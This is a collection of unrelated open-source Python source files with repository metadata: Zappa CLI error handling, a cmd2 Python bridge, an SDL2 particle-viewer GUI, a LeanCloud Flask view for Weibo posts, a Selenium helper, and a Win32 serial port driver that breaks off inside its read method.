"? Let us " + click.style("know", fg='green', bold=True) + "! :D")
click.echo("File bug reports on " + click.style("GitHub", bold=True) + " here: "
+ click.style("https://github.com/Miserlou/Zappa", fg='cyan', bold=True))
click.echo("And join our " + click.style("Slack", bold=True) + " channel here: "
+ click.style("https://slack.zappa.io", fg='cyan', bold=True))
click.echo("Love!,")
click.echo(" ~ Team " + click.style("Zappa", bold=True) + "!")
def handle(): # pragma: no cover
"""
Main program execution handler.
"""
try:
cli = ZappaCLI()
sys.exit(cli.handle())
except SystemExit as e: # pragma: no cover
cli.on_exit()
sys.exit(e.code)
except KeyboardInterrupt: # pragma: no cover
cli.on_exit()
sys.exit(130)
except Exception as e:
cli.on_exit()
click.echo("Oh no! An " + click.style("error occurred", fg='red', bold=True) + "! :(")
click.echo("\n==============\n")
import traceback
traceback.print_exc()
click.echo("\n==============\n")
shamelessly_promote()
sys.exit(-1)
if __name__ == '__main__': # pragma: no cover
handle()
|
parroyo/Zappa
|
zappa/cli.py
|
Python
|
mit
| 87,982
|
# coding=utf-8
"""
Bridges calls made inside of a Python environment to the Cmd2 host app
while maintaining a reasonable degree of isolation between the two.
"""
import sys
from contextlib import (
redirect_stderr,
redirect_stdout,
)
from typing import (
IO,
TYPE_CHECKING,
Any,
List,
NamedTuple,
Optional,
TextIO,
Union,
cast,
)
from .utils import ( # namedtuple_with_defaults,
StdSim,
)
if TYPE_CHECKING: # pragma: no cover
import cmd2
class CommandResult(NamedTuple):
"""Encapsulates the results from a cmd2 app command
:stdout: str - output captured from stdout while this command is executing
:stderr: str - output captured from stderr while this command is executing
:stop: bool - return value of onecmd_plus_hooks after it runs the given
command line.
:data: possible data populated by the command.
Any combination of these fields can be used when developing a scripting API
for a given command. By default stdout, stderr, and stop will be captured
for you. If there is additional command specific data, then write that to
cmd2's last_result member. That becomes the data member of this tuple.
In some cases, the data member may contain everything needed for a command
and storing stdout and stderr might just be a duplication of data that
wastes memory. In that case, the StdSim can be told not to store output
with its pause_storage member. While this member is True, any output sent
to StdSim won't be saved in its buffer.
The code would look like this::
if isinstance(self.stdout, StdSim):
self.stdout.pause_storage = True
if isinstance(sys.stderr, StdSim):
sys.stderr.pause_storage = True
See :class:`~cmd2.utils.StdSim` for more information.
.. note::
Named tuples are immutable. The contents are there for access,
not for modification.
"""
stdout: str = ''
stderr: str = ''
stop: bool = False
data: Any = None
def __bool__(self) -> bool:
"""Returns True if the command succeeded, otherwise False"""
# If data was set, then use it to determine success
if self.data is not None:
return bool(self.data)
# Otherwise check if stderr was filled out
else:
return not self.stderr
class PyBridge:
"""Provides a Python API wrapper for application commands."""
def __init__(self, cmd2_app: 'cmd2.Cmd') -> None:
self._cmd2_app = cmd2_app
self.cmd_echo = False
# Tells if any of the commands run via __call__ returned True for stop
self.stop = False
def __dir__(self) -> List[str]:
"""Return a custom set of attribute names"""
attributes: List[str] = []
attributes.insert(0, 'cmd_echo')
return attributes
def __call__(self, command: str, *, echo: Optional[bool] = None) -> CommandResult:
"""
Provide functionality to call application commands by calling PyBridge
ex: app('help')
:param command: command line being run
:param echo: If provided, this temporarily overrides the value of self.cmd_echo while the
command runs. If True, output will be echoed to stdout/stderr. (Defaults to None)
"""
if echo is None:
echo = self.cmd_echo
# This will be used to capture _cmd2_app.stdout and sys.stdout
copy_cmd_stdout = StdSim(cast(Union[TextIO, StdSim], self._cmd2_app.stdout), echo=echo)
# Pause the storing of stdout until onecmd_plus_hooks enables it
copy_cmd_stdout.pause_storage = True
# This will be used to capture sys.stderr
copy_stderr = StdSim(sys.stderr, echo=echo)
self._cmd2_app.last_result = None
stop = False
try:
self._cmd2_app.stdout = cast(TextIO, copy_cmd_stdout)
with redirect_stdout(cast(IO[str], copy_cmd_stdout)):
with redirect_stderr(cast(IO[str], copy_stderr)):
stop = self._cmd2_app.onecmd_plus_hooks(command, py_bridge_call=True)
finally:
with self._cmd2_app.sigint_protection:
self._cmd2_app.stdout = cast(IO[str], copy_cmd_stdout.inner_stream)
self.stop = stop or self.stop
# Save the result
result = CommandResult(
stdout=copy_cmd_stdout.getvalue(),
stderr=copy_stderr.getvalue(),
stop=stop,
data=self._cmd2_app.last_result,
)
return result
|
python-cmd2/cmd2
|
cmd2/py_bridge.py
|
Python
|
mit
| 4,605
|
"""Graphical user interface."""
import collections
import ctypes
import sdl2
import hienoi.renderer
from hienoi._common import GLProfile, GraphicsAPI, ParticleDisplay, UserData
from hienoi._vectors import Vector2i, Vector2f, Vector4f
class NavigationAction(object):
"""Enumerator for the current nagivation action.
Attributes
----------
NONE
MOVE
ZOOM
"""
NONE = 0
MOVE = 1
ZOOM = 2
_Handles = collections.namedtuple(
'_Handles', (
'window',
'renderer',
))
_GLHandles = collections.namedtuple(
'_GLHandles', (
'context',
))
_RGBMasks = collections.namedtuple(
'_RGBMasks', (
'red',
'green',
'blue',
))
_FIT_VIEW_REL_PADDING = 2.0
if sdl2.SDL_BYTEORDER == sdl2.SDL_LIL_ENDIAN:
_RGB_MASKS = _RGBMasks(red=0x000000FF, green=0x0000FF00, blue=0x00FF0000)
else:
_RGB_MASKS = _RGBMasks(red=0x00FF0000, green=0x0000FF00, blue=0x000000FF)
class GUI(object):
"""GUI.
Parameters
----------
window_title : str
Title for the window.
window_position : hienoi.Vector2i
Initial window position.
window_size : hienoi.Vector2i
Initial window size.
window_flags : int
SDL2 window flags.
view_aperture_x : float
Initial length in world units to be shown on the X axis.
view_zoom_range : hienoi.Vector2f
Zoom value range for the view.
mouse_wheel_step : float
Coefficient value for each mouse wheel step.
grid_density : float
See :attr:`GUI.grid_density`.
grid_adaptive_threshold : float
See :attr:`GUI.grid_adaptive_threshold`.
show_grid : bool
See :attr:`GUI.show_grid`.
background_color : hienoi.Vector4f
See :attr:`GUI.background_color`.
grid_color : hienoi.Vector4f
See :attr:`GUI.grid_color`.
grid_origin_color : hienoi.Vector4f
See :attr:`GUI.grid_origin_color`.
particle_display : int
See :attr:`GUI.particle_display`.
point_size : int
See :attr:`GUI.point_size`.
edge_feather : float
See :attr:`GUI.edge_feather`.
stroke_width : float
See :attr:`GUI.stroke_width`.
initialize_callback : function
Callback function to initialize any GUI state.
It takes a single argument ``gui``, an instance of this class.
on_event_callback : function
Callback function ran during the event polling.
It takes 3 arguments: ``gui``, an instance of this class,
``data``, some data to pass back and forth between the caller and this
callback function, and ``event``, the event fired.
renderer : dict
Keyword arguments for the configuration of the renderer. See the
parameters for the class :class:`hienoi.renderer.Renderer`.
Attributes
----------
view_position : hienoi.Vector2f
Position of the view (camera).
view_zoom : float
Current zoom value for the view.
grid_density : float
Density of the grid.
A density of 10.0 means that there are around 10 grid divisions
displayed on the X axis. A grid division unit represents a fixed length
in world units, meaning that the actual grid density changes depending
on the view's zoom.
show_grid : bool
True to show the grid.
background_color : hienoi.Vector4f
Color for the background.
grid_color : hienoi.Vector4f
Color for the grid.
grid_origin_color : hienoi.Vector4f
Color for the origin axis of the grid.
particle_display : int
Display mode for the particles. Available values are enumerated in the
:class:`~hienoi.ParticleDisplay` class.
point_size : int
Size of the particles in pixels when the display mode is set to
:attr:`~hienoi.ParticleDisplay.POINT`.
edge_feather : float
Feather fall-off in pixels to apply to objects drawn with displays such
as :attr:`~hienoi.ParticleDisplay.CIRCLE` or
:attr:`~hienoi.ParticleDisplay.DISC`.
stroke_width : float
Width of the stroke in pixels to apply to objects drawn with displays
such as :attr:`~hienoi.ParticleDisplay.CIRCLE`.
quit : bool
``True`` to signal to the application that it should quit.
has_view_changed : bool
``True`` if the view state has just been changed following an event. It
is reset to ``False`` whenever :meth:`poll_events` is called.
user_data : object
Attribute reserved for any user data.
"""
def __init__(self,
window_title='hienoi',
window_position=Vector2i(sdl2.SDL_WINDOWPOS_CENTERED,
sdl2.SDL_WINDOWPOS_CENTERED),
window_size=Vector2i(800, 600),
window_flags=sdl2.SDL_WINDOW_RESIZABLE,
view_aperture_x=100.0,
view_zoom_range=Vector2f(1e-6, 1e+6),
mouse_wheel_step=0.01,
grid_density=10.0,
grid_adaptive_threshold=3.0,
show_grid=True,
background_color=Vector4f(0.15, 0.15, 0.15, 1.0),
grid_color=Vector4f(0.85, 0.85, 0.85, 0.05),
grid_origin_color=Vector4f(0.85, 0.25, 0.25, 0.25),
particle_display=ParticleDisplay.DISC,
point_size=4,
edge_feather=2.0,
stroke_width=0.0,
initialize_callback=None,
on_event_callback=None,
renderer=None):
renderer = {} if renderer is None else renderer
if sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO) != 0:
raise RuntimeError(sdl2.SDL_GetError().decode())
renderer_info = hienoi.renderer.get_info()
if renderer_info.api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_MAJOR_VERSION,
renderer_info.major_version)
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_MINOR_VERSION,
renderer_info.minor_version)
if renderer_info.profile == GLProfile.CORE:
sdl2.SDL_GL_SetAttribute(sdl2.SDL_GL_CONTEXT_PROFILE_MASK,
sdl2.SDL_GL_CONTEXT_PROFILE_CORE)
self._handles = _create_handles(window_title, window_position,
window_size, window_flags,
renderer_info)
self._renderer = hienoi.renderer.Renderer(**renderer)
self._initial_view_aperture_x = view_aperture_x
self._view_zoom_range = view_zoom_range
self._mouse_wheel_step = mouse_wheel_step
self._grid_adaptive_threshold = grid_adaptive_threshold
self._on_event_callback = on_event_callback
self._listen_for_navigation = False
self._is_view_manipulated = False
self.view_position = Vector2f(0.0, 0.0)
self._view_zoom = 1.0
self.grid_density = grid_density
self.show_grid = show_grid
self.background_color = background_color
self.grid_color = grid_color
self.grid_origin_color = grid_origin_color
self.particle_display = particle_display
self.point_size = point_size
self.edge_feather = edge_feather
self.stroke_width = stroke_width
self._navigation_action = NavigationAction.NONE
self.quit = False
self.user_data = UserData()
if initialize_callback:
initialize_callback(self)
@property
def view_zoom(self):
return self._view_zoom
@view_zoom.setter
def view_zoom(self, value):
self._view_zoom = max(self._view_zoom_range[0],
min(self._view_zoom_range[1], value))
@property
def navigation_action(self):
return self._navigation_action
@property
def has_view_changed(self):
return self._has_view_changed
def poll_events(self, scene_state, data=None):
"""Process each event in the queue.
Parameters
----------
scene_state : hienoi.renderer.SceneState
Scene state.
data : object
Data to pass back and forth between the caller and the function set
for the 'on event' callback.
"""
self._has_view_changed = False
event = sdl2.SDL_Event()
while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
event_type = event.type
if event_type == sdl2.SDL_QUIT:
self._on_quit_event(event.quit)
elif event_type == sdl2.SDL_WINDOWEVENT:
self._on_window_event(event.window)
elif event_type == sdl2.SDL_KEYDOWN:
self._on_key_down_event(event.key, scene_state)
elif event_type == sdl2.SDL_KEYUP:
self._on_key_up_event(event.key)
elif event_type == sdl2.SDL_MOUSEBUTTONDOWN:
self._on_mouse_button_down_event(event.button)
elif event_type == sdl2.SDL_MOUSEBUTTONUP:
self._on_mouse_button_up_event(event.button)
elif event_type == sdl2.SDL_MOUSEWHEEL:
self._on_mouse_wheel_event(event.wheel)
elif event_type == sdl2.SDL_MOUSEMOTION:
self._on_mouse_motion_event(event.motion)
if self._on_event_callback:
self._on_event_callback(self, data, event)
if self.quit:
break
def render(self, scene_state):
"""Render a new frame.
Parameters
----------
scene_state : hienoi.renderer.SceneState
Scene state.
"""
renderer_state = hienoi.renderer.State(
window_size=self.get_window_size(),
view_position=self.view_position,
view_zoom=self._view_zoom,
origin=self.world_to_screen(Vector2f(0.0, 0.0)),
initial_view_aperture_x=self._initial_view_aperture_x,
view_aperture=self.get_view_aperture(),
grid_density=self.grid_density,
grid_adaptive_threshold=self._grid_adaptive_threshold,
background_color=self.background_color,
grid_color=self.grid_color,
grid_origin_color=self.grid_origin_color,
show_grid=self.show_grid,
particle_display=self.particle_display,
point_size=self.point_size,
edge_feather=self.edge_feather,
stroke_width=self.stroke_width,
)
self._renderer.render(renderer_state, scene_state)
if hienoi.renderer.get_info().api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_SwapWindow(self._handles.window)
def terminate(self):
"""Cleanup the GUI resources."""
self._renderer.cleanup()
if hienoi.renderer.get_info().api == GraphicsAPI.OPENGL:
sdl2.SDL_GL_DeleteContext(self._handles.renderer.context)
sdl2.SDL_DestroyWindow(self._handles.window)
sdl2.SDL_Quit()
def get_window_size(self):
"""Retrieve the window size.
Returns
-------
hienoi.Vector2i
The window size.
"""
window_size_x = ctypes.c_int()
window_size_y = ctypes.c_int()
sdl2.SDL_GetWindowSize(self._handles.window,
ctypes.byref(window_size_x),
ctypes.byref(window_size_y))
return Vector2i(window_size_x.value, window_size_y.value)
def get_view_aperture(self):
"""Retrieve the view aperture.
It represents the area in world units covered by the view.
Returns
-------
hienoi.Vector2f
The view aperture.
"""
window_size = self.get_window_size()
aperture_x = self._initial_view_aperture_x / self._view_zoom
return Vector2f(aperture_x, aperture_x * window_size.y / window_size.x)
def get_mouse_position(self):
"""Retrieve the mouse position in screen space.
Returns
-------
hienoi.Vector2i
The mouse position.
"""
position_x = ctypes.c_int()
position_y = ctypes.c_int()
sdl2.SDL_GetMouseState(ctypes.byref(position_x),
ctypes.byref(position_y))
return Vector2i(position_x.value, position_y.value)
def get_screen_to_world_ratio(self):
"""Retrieve the ratio to convert a sreen unit into a world unit.
Returns
-------
float
The screen to world ratio.
"""
window_size = self.get_window_size()
aperture_x = self._initial_view_aperture_x / self._view_zoom
return aperture_x / window_size.x
def screen_to_world(self, point):
"""Convert a point from screen space to world space coordinates.
Parameters
----------
point : hienoi.Vector2i
Point in screen space coordinates.
Returns
-------
hienoi.Vector2f
The point in world space coordinates.
"""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
return Vector2f(
(self.view_position.x
+ (point.x - window_size.x / 2.0)
* view_aperture.x / window_size.x),
(self.view_position.y
- (point.y - window_size.y / 2.0)
* view_aperture.y / window_size.y))
def world_to_screen(self, point):
"""Convert a point from world space to screen space coordinates.
Parameters
----------
point : hienoi.Vector2f
Point in world space coordinates.
Returns
-------
hienoi.Vector2i
The point in screen space coordinates.
"""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
return Vector2i(
int(round(
(window_size.x / view_aperture.x)
* (-self.view_position.x + point.x + view_aperture.x / 2.0))),
int(round(
(window_size.y / view_aperture.y)
* (self.view_position.y - point.y + view_aperture.y / 2.0))))
def write_snapshot(self, filename):
"""Take a snapshot of the view and write it as a BMP image.
Parameters
----------
filename : str
Destination filename.
"""
pixel_size = 4
pixels = self._renderer.read_pixels()
surface = sdl2.SDL_CreateRGBSurfaceFrom(
pixels.data, pixels.width, pixels.height,
8 * pixel_size, pixels.width * pixel_size,
_RGB_MASKS.red, _RGB_MASKS.green, _RGB_MASKS.blue, 0)
sdl2.SDL_SaveBMP(surface, filename)
sdl2.SDL_FreeSurface(surface)
def _reset_view(self):
"""Reset the view position and zoom."""
self.view_position = Vector2f(0.0, 0.0)
self.view_zoom = 1.0
self._has_view_changed = True
def _fit_view(self, scene_state):
"""Fit the view to the scene."""
if len(scene_state.particles) > 1:
window_size = self.get_window_size()
initial_size = Vector2f(
self._initial_view_aperture_x,
self._initial_view_aperture_x * window_size.y / window_size.x)
lower_bounds = scene_state.lower_bounds
upper_bounds = scene_state.upper_bounds
required_size = (upper_bounds - lower_bounds).iscale(
_FIT_VIEW_REL_PADDING)
required_size = Vector2f(
max(required_size.x,
initial_size.x * self._view_zoom_range[0]),
max(required_size.y,
initial_size.y * self._view_zoom_range[0]))
self.view_position = (lower_bounds + upper_bounds).iscale(0.5)
self.view_zoom = min(initial_size.x / required_size.x,
initial_size.y / required_size.y)
elif len(scene_state.particles) == 1:
self.view_position = Vector2f(
*scene_state.particles['position'][0])
self.view_zoom = 1.0
else:
self._reset_view()
self._has_view_changed = True
def _on_quit_event(self, event):
"""Event 'on quit'."""
self.quit = True
def _on_window_event(self, event):
"""Event 'on window'."""
if event.event == sdl2.SDL_WINDOWEVENT_SIZE_CHANGED:
self._renderer.resize(event.data1, event.data2)
def _on_key_down_event(self, event, scene_state):
"""Event 'on key down'."""
code = event.keysym.sym
modifier = event.keysym.mod
if modifier == sdl2.KMOD_NONE:
if code == sdl2.SDLK_SPACE:
self._listen_for_navigation = True
elif code == sdl2.SDLK_d:
self.particle_display = (
(self.particle_display + 1) % (ParticleDisplay._LAST + 1))
elif code == sdl2.SDLK_f:
self._fit_view(scene_state)
elif code == sdl2.SDLK_g:
self.show_grid = not self.show_grid
elif code == sdl2.SDLK_r:
self._reset_view()
def _on_key_up_event(self, event):
"""Event 'on key up'."""
code = event.keysym.sym
if code == sdl2.SDLK_SPACE:
self._listen_for_navigation = False
def _on_mouse_button_down_event(self, event):
"""Event 'on mouse button down'."""
if self._listen_for_navigation:
if event.button == sdl2.SDL_BUTTON_LEFT:
self._navigation_action = NavigationAction.MOVE
elif event.button == sdl2.SDL_BUTTON_RIGHT:
self._navigation_action = NavigationAction.ZOOM
def _on_mouse_button_up_event(self, event):
"""Event 'on mouse button up'."""
if (event.button == sdl2.SDL_BUTTON_LEFT
or event.button == sdl2.SDL_BUTTON_RIGHT):
self._navigation_action = NavigationAction.NONE
def _on_mouse_wheel_event(self, event):
"""Event 'on mouse wheel'."""
scale = 1.0 + self._mouse_wheel_step * event.y
self.view_zoom *= scale
self._has_view_changed = True
def _on_mouse_motion_event(self, event):
"""Event 'on mouse motion'."""
window_size = self.get_window_size()
view_aperture = self.get_view_aperture()
if self._navigation_action == NavigationAction.MOVE:
self.view_position.set(
(self.view_position.x
- event.xrel * view_aperture.x / window_size.x),
(self.view_position.y
+ event.yrel * view_aperture.y / window_size.y))
self._has_view_changed = True
elif self._navigation_action == NavigationAction.ZOOM:
scale = (1.0
+ float(event.xrel) / window_size.x
- float(event.yrel) / window_size.y)
self.view_zoom *= scale
self._has_view_changed = True
def _create_handles(window_title, window_position, window_size, window_flags,
renderer_info):
"""Create the SDL2 handles."""
window_flags = sdl2.SDL_WINDOW_SHOWN | window_flags
if renderer_info.api == GraphicsAPI.OPENGL:
window_flags |= sdl2.SDL_WINDOW_OPENGL
window = sdl2.SDL_CreateWindow(
window_title.encode(),
window_position.x, window_position.y,
window_size.x, window_size.y,
window_flags)
if not window:
raise RuntimeError(sdl2.SDL_GetError().decode())
context = sdl2.SDL_GL_CreateContext(window)
if not context:
raise RuntimeError(sdl2.SDL_GetError().decode())
# Try to disable the vertical synchronization. It applies to the active
# context and thus needs to be called after `SDL_GL_CreateContext`.
sdl2.SDL_GL_SetSwapInterval(0)
return _Handles(
window=window,
renderer=_GLHandles(context=context))
|
christophercrouzet/hienoi
|
hienoi/gui.py
|
Python
|
mit
| 20,220
|
# coding: utf-8
from leancloud import Object
from leancloud import Query
from leancloud import LeanCloudError
from flask import Blueprint
from flask import request
from flask import redirect
from flask import url_for
from flask import render_template
import sys
sys.path.insert(0,'../')
from utils import JsonDict
import logging
import json
class Weibo(Object):
pass
weibos_handler = Blueprint('weibos', __name__)
@weibos_handler.route('', methods=['GET'])
def show():
try:
weibos = Query(Weibo).descending('createdAt').find()
except LeanCloudError, e:
#服务端还没有Weibo这个Class
if e.code == 101:
weibos = []
else:
raise e
return render_template('weibos.html', weibos=weibos)
"""
try:
todos = Query(Todo).descending('createdAt').find()
except LeanCloudError, e:
if e.code == 101: # 服务端对应的 Class 还没创建
todos = []
else:
raise e
return render_template('todos.html', todos=todos)
"""
@weibos_handler.route('', methods=['POST'])
def add():
#获取搜索出来的某一页里的微博数据
weibos = request.json['weibos']
#将这些微博数据存到leancloud
new_mid_list = []
for _weibo in weibos:
_weibo = JsonDict(_weibo)
#判断这条微博是否已经保存过
_weibo_is_saved = len(Query(Weibo).equal_to('mid',_weibo.mid).find()) > 0
if not _weibo_is_saved:
#parse it to leancloud object
weibo = Weibo(mid=_weibo.mid, nickname=_weibo.user_nick_name, timestamp = _weibo.timestamp, topic = _weibo.topic, pics = _weibo.pics)
weibo.save()
new_mid_list.append(_weibo.mid)
return u'话题#%s#新增了%s条微博:%s' % (_weibo.topic, len(new_mid_list), ",".join(new_mid_list))
"""
todo = Todo(content=content)
todo.save()
return redirect(url_for('todos.show'))
"""
|
zhangw/leancloud_apperance_app
|
views/weibos.py
|
Python
|
mit
| 1,920
|
from selenium.webdriver.support.select import Select
def get_selected_option(browser, css_selector):
# Takes a css selector for a <select> element and returns the value of
# the selected option
select = Select(browser.find_element_by_css_selector(css_selector))
return select.first_selected_option.get_attribute('value')
|
egineering-llc/egat_example_project
|
tests/test_helpers/selenium_helper.py
|
Python
|
mit
| 338
|
#! python
# Python Serial Port Extension for Win32, Linux, BSD, Jython
# serial driver for win32
# see __init__.py
#
# (C) 2001-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Initial patch to use ctypes by Giovanni Bajo <rasky@develer.com>
import ctypes
import time
from serial import win32
import serial
from serial.serialutil import SerialBase, SerialException, to_bytes, portNotOpenError, writeTimeoutError
class Serial(SerialBase):
"""Serial port implementation for Win32 based on ctypes."""
BAUDRATES = (50, 75, 110, 134, 150, 200, 300, 600, 1200, 1800, 2400, 4800,
9600, 19200, 38400, 57600, 115200)
def __init__(self, *args, **kwargs):
super(SerialBase, self).__init__()
self._port_handle = None
self._overlapped_read = None
self._overlapped_write = None
SerialBase.__init__(self, *args, **kwargs)
def open(self):
"""\
Open port with current settings. This may throw a SerialException
if the port cannot be opened.
"""
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
if self.is_open:
raise SerialException("Port is already open.")
# the "\\.\COMx" format is required for devices other than COM1-COM8
# not all versions of windows seem to support this properly
# so that the first few ports are used with the DOS device name
port = self.name
try:
if port.upper().startswith('COM') and int(port[3:]) > 8:
port = '\\\\.\\' + port
except ValueError:
# for like COMnotanumber
pass
self._port_handle = win32.CreateFile(
port,
win32.GENERIC_READ | win32.GENERIC_WRITE,
0, # exclusive access
None, # no security
win32.OPEN_EXISTING,
win32.FILE_ATTRIBUTE_NORMAL | win32.FILE_FLAG_OVERLAPPED,
0)
if self._port_handle == win32.INVALID_HANDLE_VALUE:
self._port_handle = None # 'cause __del__ is called anyway
raise SerialException("could not open port %r: %r" % (self.portstr, ctypes.WinError()))
try:
self._overlapped_read = win32.OVERLAPPED()
self._overlapped_read.hEvent = win32.CreateEvent(None, 1, 0, None)
self._overlapped_write = win32.OVERLAPPED()
#~ self._overlapped_write.hEvent = win32.CreateEvent(None, 1, 0, None)
self._overlapped_write.hEvent = win32.CreateEvent(None, 0, 0, None)
# Setup a 4k buffer
win32.SetupComm(self._port_handle, 4096, 4096)
# Save original timeout values:
self._orgTimeouts = win32.COMMTIMEOUTS()
win32.GetCommTimeouts(self._port_handle, ctypes.byref(self._orgTimeouts))
self._reconfigure_port()
# Clear buffers:
# Remove anything that was there
win32.PurgeComm(
self._port_handle,
win32.PURGE_TXCLEAR | win32.PURGE_TXABORT |
win32.PURGE_RXCLEAR | win32.PURGE_RXABORT)
except:
try:
self._close()
except:
# ignore any exception when closing the port
# also to keep original exception that happened when setting up
pass
self._port_handle = None
raise
else:
self.is_open = True
def _reconfigure_port(self):
"""Set communication parameters on opened port."""
if not self._port_handle:
raise SerialException("Can only operate on a valid port handle")
# Set Windows timeout values
# timeouts is a tuple with the following items:
# (ReadIntervalTimeout,ReadTotalTimeoutMultiplier,
# ReadTotalTimeoutConstant,WriteTotalTimeoutMultiplier,
# WriteTotalTimeoutConstant)
timeouts = win32.COMMTIMEOUTS()
if self._timeout is None:
pass # default of all zeros is OK
elif self._timeout == 0:
timeouts.ReadIntervalTimeout = win32.MAXDWORD
else:
timeouts.ReadTotalTimeoutConstant = max(int(self._timeout * 1000), 1)
if self._timeout != 0 and self._inter_byte_timeout is not None:
timeouts.ReadIntervalTimeout = max(int(self._inter_byte_timeout * 1000), 1)
if self._write_timeout is None:
pass
elif self._write_timeout == 0:
timeouts.WriteTotalTimeoutConstant = win32.MAXDWORD
else:
timeouts.WriteTotalTimeoutConstant = max(int(self._write_timeout * 1000), 1)
win32.SetCommTimeouts(self._port_handle, ctypes.byref(timeouts))
win32.SetCommMask(self._port_handle, win32.EV_ERR)
# Setup the connection info.
# Get state and modify it:
comDCB = win32.DCB()
win32.GetCommState(self._port_handle, ctypes.byref(comDCB))
comDCB.BaudRate = self._baudrate
if self._bytesize == serial.FIVEBITS:
comDCB.ByteSize = 5
elif self._bytesize == serial.SIXBITS:
comDCB.ByteSize = 6
elif self._bytesize == serial.SEVENBITS:
comDCB.ByteSize = 7
elif self._bytesize == serial.EIGHTBITS:
comDCB.ByteSize = 8
else:
raise ValueError("Unsupported number of data bits: %r" % self._bytesize)
if self._parity == serial.PARITY_NONE:
comDCB.Parity = win32.NOPARITY
comDCB.fParity = 0 # Disable Parity Check
elif self._parity == serial.PARITY_EVEN:
comDCB.Parity = win32.EVENPARITY
comDCB.fParity = 1 # Enable Parity Check
elif self._parity == serial.PARITY_ODD:
comDCB.Parity = win32.ODDPARITY
comDCB.fParity = 1 # Enable Parity Check
elif self._parity == serial.PARITY_MARK:
comDCB.Parity = win32.MARKPARITY
comDCB.fParity = 1 # Enable Parity Check
elif self._parity == serial.PARITY_SPACE:
comDCB.Parity = win32.SPACEPARITY
comDCB.fParity = 1 # Enable Parity Check
else:
raise ValueError("Unsupported parity mode: %r" % self._parity)
if self._stopbits == serial.STOPBITS_ONE:
comDCB.StopBits = win32.ONESTOPBIT
elif self._stopbits == serial.STOPBITS_ONE_POINT_FIVE:
comDCB.StopBits = win32.ONE5STOPBITS
elif self._stopbits == serial.STOPBITS_TWO:
comDCB.StopBits = win32.TWOSTOPBITS
else:
raise ValueError("Unsupported number of stop bits: %r" % self._stopbits)
comDCB.fBinary = 1 # Enable Binary Transmission
# Char. w/ Parity-Err are replaced with 0xff (if fErrorChar is set to TRUE)
if self._rs485_mode is None:
if self._rtscts:
comDCB.fRtsControl = win32.RTS_CONTROL_HANDSHAKE
else:
comDCB.fRtsControl = win32.RTS_CONTROL_ENABLE if self._rts_state else win32.RTS_CONTROL_DISABLE
comDCB.fOutxCtsFlow = self._rtscts
else:
# checks for unsupported settings
# XXX verify if platform really does not have a setting for those
if not self._rs485_mode.rts_level_for_tx:
raise ValueError(
'Unsupported value for RS485Settings.rts_level_for_tx: %r' % (
self._rs485_mode.rts_level_for_tx,))
if self._rs485_mode.rts_level_for_rx:
raise ValueError(
'Unsupported value for RS485Settings.rts_level_for_rx: %r' % (
self._rs485_mode.rts_level_for_rx,))
if self._rs485_mode.delay_before_tx is not None:
raise ValueError(
'Unsupported value for RS485Settings.delay_before_tx: %r' % (
self._rs485_mode.delay_before_tx,))
if self._rs485_mode.delay_before_rx is not None:
raise ValueError(
'Unsupported value for RS485Settings.delay_before_rx: %r' % (
self._rs485_mode.delay_before_rx,))
if self._rs485_mode.loopback:
raise ValueError(
'Unsupported value for RS485Settings.loopback: %r' % (
self._rs485_mode.loopback,))
comDCB.fRtsControl = win32.RTS_CONTROL_TOGGLE
comDCB.fOutxCtsFlow = 0
if self._dsrdtr:
comDCB.fDtrControl = win32.DTR_CONTROL_HANDSHAKE
else:
comDCB.fDtrControl = win32.DTR_CONTROL_ENABLE if self._dtr_state else win32.DTR_CONTROL_DISABLE
comDCB.fOutxDsrFlow = self._dsrdtr
comDCB.fOutX = self._xonxoff
comDCB.fInX = self._xonxoff
comDCB.fNull = 0
comDCB.fErrorChar = 0
comDCB.fAbortOnError = 0
comDCB.XonChar = serial.XON
comDCB.XoffChar = serial.XOFF
if not win32.SetCommState(self._port_handle, ctypes.byref(comDCB)):
raise ValueError("Cannot configure port, some setting was wrong. Original message: %r" % ctypes.WinError())
#~ def __del__(self):
#~ self.close()
def _close(self):
"""internal close port helper"""
if self._port_handle:
# Restore original timeout values:
win32.SetCommTimeouts(self._port_handle, self._orgTimeouts)
# Close COM-Port:
win32.CloseHandle(self._port_handle)
if self._overlapped_read is not None:
win32.CloseHandle(self._overlapped_read.hEvent)
self._overlapped_read = None
if self._overlapped_write is not None:
win32.CloseHandle(self._overlapped_write.hEvent)
self._overlapped_write = None
self._port_handle = None
def close(self):
"""Close port"""
if self.is_open:
self._close()
self.is_open = False
# - - - - - - - - - - - - - - - - - - - - - - - -
@property
def in_waiting(self):
"""Return the number of bytes currently in the input buffer."""
flags = win32.DWORD()
comstat = win32.COMSTAT()
if not win32.ClearCommError(self._port_handle, ctypes.byref(flags), ctypes.byref(comstat)):
raise SerialException('call to ClearCommError failed')
return comstat.cbInQue
def read(self, size=1):
"""\
Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read."""
if not self._port_handle:
raise portNotOpenError
if size > 0:
win32.ResetEvent(self._overlapped_read.hEvent)
flags = win32.DWORD()
comstat = win32.COMSTAT()
if not win32.ClearCommError(self._port_handle, ctypes.byref(flags), ctypes.byref(comstat)):
raise SerialException('call to ClearCommError failed')
if self.timeout == 0:
n = min(comstat.cbInQue, size)
if n > 0:
buf = ctypes.create_string_buffer(n)
rc = win32.DWORD()
read_ok = win32.ReadFile(self._port_handle, buf, n, ctypes.byref(rc), ctypes.byref(self._overlapped_read))
if not read_ok and win32.GetLastError() not in (win32.ERROR_SUCCESS, win32.ERROR_IO_PENDING):
raise SerialException("ReadFile failed (%r)" % ctypes.WinError())
win32.WaitForSingleObject(self._overlapped_read.hEvent, win32.INFINITE)
read = buf.raw[:rc.value]
else:
read = bytes()
else:
buf = ctypes.create_string_buffer(size)
rc = win32.DWORD()
read_ok = win32.ReadFile(self._port_handle, buf, size, ctypes.byref(rc), ctypes.byref(self._overlapped_read))
if not read_ok and win32.GetLastError() not in (win32.ERROR_SUCCESS, win32.ERROR_IO_PENDING):
raise SerialException("ReadFile failed (%r)" % ctypes.WinError())
